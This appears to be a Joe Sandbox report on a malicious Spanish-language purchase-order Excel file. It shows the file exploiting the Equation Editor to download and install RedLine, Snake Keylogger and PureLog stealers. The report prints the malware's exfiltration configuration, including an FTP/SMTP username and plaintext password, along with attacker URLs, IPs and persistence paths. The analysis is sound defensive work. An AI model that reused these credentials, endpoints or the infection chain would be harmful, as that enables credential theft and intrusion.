Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Orden de compra 0001-00255454.xlam.xlsx

Overview

General Information

Sample name:Orden de compra 0001-00255454.xlam.xlsx
Analysis ID:1436299
MD5:a2e67a3d40ebd7f8872ebb1dda01aba9
SHA1:27feddfa7d771ff519757beaac8c974330e14e1d
SHA256:5242cb2077f21596ec657daf5b6c45087259b85708f959f22b2490d1a381dd36
Tags:xlamxlsx
Infos:

Detection

PureLog Stealer, RedLine, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Snake Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
Binary is likely a compiled AutoIt script file
Document exploit detected (process start blacklist hit)
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Installs new ROOT certificates
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 980 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 1924 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • negrett.exe (PID: 1500 cmdline: C:\Users\user\AppData\Roaming\negrett.exe MD5: FBCCDD35EE6DCCADAEAA69E37FBBD171)
        • name.exe (PID: 2504 cmdline: C:\Users\user\AppData\Roaming\negrett.exe MD5: CF439A4CF698F8D15901A3CAA5F503FE)
          • RegSvcs.exe (PID: 1304 cmdline: C:\Users\user\AppData\Roaming\negrett.exe MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
  • wscript.exe (PID: 2644 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: 045451FA238A75305CC26AC982472367)
    • name.exe (PID: 2308 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: CF439A4CF698F8D15901A3CAA5F503FE)
      • RegSvcs.exe (PID: 2160 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "FTP Server": "ftp://ftp.antoniomayol.com/", "FTP Username": "johnson@antoniomayol.com", "Password": "DAIpro123**", "Username": "contabilidad@daipro.com.mx", "Host": "mail.daipro.com.mx", "Port": "587"}
SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x1bd2:$s1: <legacyDrawing r:id="
  • 0x1bfa:$s2: <oleObject progId="
  • 0x1c4c:$s3: autoLoad="true"
SourceRuleDescriptionAuthorStrings
00000009.00000002.887505835.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
      • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
      • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
      • 0x700:$s3: 83 EC 38 53 B0 F5 88 44 24 2B 88 44 24 2F B0 0C 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
      • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
      • 0x1e9d0:$s5: delete[]
      • 0x1de88:$s6: constructor or from DllMain.
      0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          Click to see the 38 entries
          SourceRuleDescriptionAuthorStrings
          11.2.name.exe.560000.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            11.2.name.exe.560000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x700:$s3: 83 EC 38 53 B0 F5 88 44 24 2B 88 44 24 2F B0 0C 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1e9d0:$s5: delete[]
            • 0x1de88:$s6: constructor or from DllMain.
            9.2.RegSvcs.exe.820ee8.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              9.2.RegSvcs.exe.820ee8.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                9.2.RegSvcs.exe.820ee8.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  Click to see the 121 entries

                  Exploits

                  barindex
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 38.242.255.115, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1924, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1924, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exe

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1924, Protocol: tcp, SourceIp: 38.242.255.115, SourceIsIpv6: false, SourcePort: 80
                  Source: Process startedAuthor: Jason Lynch: Data: Command: C:\Users\user\AppData\Roaming\negrett.exe, CommandLine: C:\Users\user\AppData\Roaming\negrett.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\negrett.exe, NewProcessName: C:\Users\user\AppData\Roaming\negrett.exe, OriginalFileName: C:\Users\user\AppData\Roaming\negrett.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1924, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Roaming\negrett.exe, ProcessId: 1500, ProcessName: negrett.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Users\user\AppData\Roaming\negrett.exe, CommandLine: C:\Users\user\AppData\Roaming\negrett.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\negrett.exe, NewProcessName: C:\Users\user\AppData\Roaming\negrett.exe, OriginalFileName: C:\Users\user\AppData\Roaming\negrett.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1924, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Roaming\negrett.exe, ProcessId: 1500, ProcessName: negrett.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 2644, ProcessName: wscript.exe
                  Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, QueryName: checkip.dyndns.org
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 2644, ProcessName: wscript.exe
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1924, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

                  Data Obfuscation

                  barindex
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 2504, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Orden de compra 0001-00255454.xlam.xlsxAvira: detected
                  Source: https://scratchdreams.tkAvira URL Cloud: Label: malware
                  Source: https://scratchdreams.tk/_send_.php?TSAvira URL Cloud: Label: malware
                  Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "FTP Server": "ftp://ftp.antoniomayol.com/", "FTP Username": "johnson@antoniomayol.com", "Password": "DAIpro123**", "Username": "contabilidad@daipro.com.mx", "Host": "mail.daipro.com.mx", "Port": "587"}
                  Source: https://scratchdreams.tkVirustotal: Detection: 18%Perma Link
                  Source: https://scratchdreams.tk/_send_.php?TSVirustotal: Detection: 16%Perma Link
                  Source: Orden de compra 0001-00255454.xlam.xlsxVirustotal: Detection: 55%Perma Link
                  Source: Orden de compra 0001-00255454.xlam.xlsxReversingLabs: Detection: 68%
                  Source: C:\Users\user\AppData\Roaming\negrett.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\directory\name.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exeJoe Sandbox ML: detected

                  Exploits

                  barindex
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 38.242.255.115 Port: 80Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 38.242.255.115 Port: 443Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\negrett.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\negrett.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.22:49166 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.22:49169 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 38.242.255.115:443 -> 192.168.2.22:49164 version: TLS 1.2
                  Source: Binary string: _.pdb source: RegSvcs.exe, 00000009.00000002.887613272.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: name.exe, 00000008.00000003.776938516.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.777173422.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.811942051.00000000011D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.813355111.0000000002B70000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,5_2_00B7DBBE
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B4C2A2 FindFirstFileExW,5_2_00B4C2A2
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B868EE FindFirstFileW,FindClose,5_2_00B868EE
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,5_2_00B8698F
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0105DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,8_2_0105DBBE
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0102C2A2 FindFirstFileExW,8_2_0102C2A2
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0106698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,8_2_0106698F
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_010668EE FindFirstFileW,FindClose,8_2_010668EE
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0105D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_0105D076
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0105D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_0105D3A9
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0106979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_0106979D
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01069642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_01069642
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01069B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,8_2_01069B2B
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01065C97 FindFirstFileW,FindNextFileW,FindClose,8_2_01065C97
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0139DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_0139DBBE
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0136C2A2 FindFirstFileExW,11_2_0136C2A2
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_013A698F
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013A68EE FindFirstFileW,FindClose,11_2_013A68EE
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0139D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_0139D076
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0139D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_0139D3A9
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_013A979D
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_013A9642
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_013A9B2B
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013A5C97 FindFirstFileW,FindNextFileW,FindClose,11_2_013A5C97
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior

                  Software Vulnerabilities

                  barindex
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035306F5 WinExec,ExitProcess,2_2_035306F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03530715 ExitProcess,2_2_03530715
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03530631 LoadLibraryW,2_2_03530631
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035306AA URLDownloadToFileW,2_2_035306AA
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0353064B URLDownloadToFileW,2_2_0353064B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h9_2_003DDC68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00A87110h9_2_00A86CF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00A86B19h9_2_00A86858
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00A84CA5h9_2_00A84AB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00A8562Fh9_2_00A84AB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00A85999h9_2_00A856D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_00A83FE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00A87110h9_2_00A86CE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00A87110h9_2_00A8703F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00A8F979h9_2_00A8F6D1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00A8F0C9h9_2_00A8EE21
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00A8F521h9_2_00A8F279
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00A86259h9_2_00A85FA4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00A866B9h9_2_00A863F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00A8FDD1h9_2_00A8FB29
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00A85DF9h9_2_00A85B47
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D24869h9_2_00D245C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D20B99h9_2_00D208F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D218A1h9_2_00D215F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D2A18Ah9_2_00D29EE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D2AE91h9_2_00D2ABE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D2AA39h9_2_00D2A790
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00D20741h9_2_00D20498
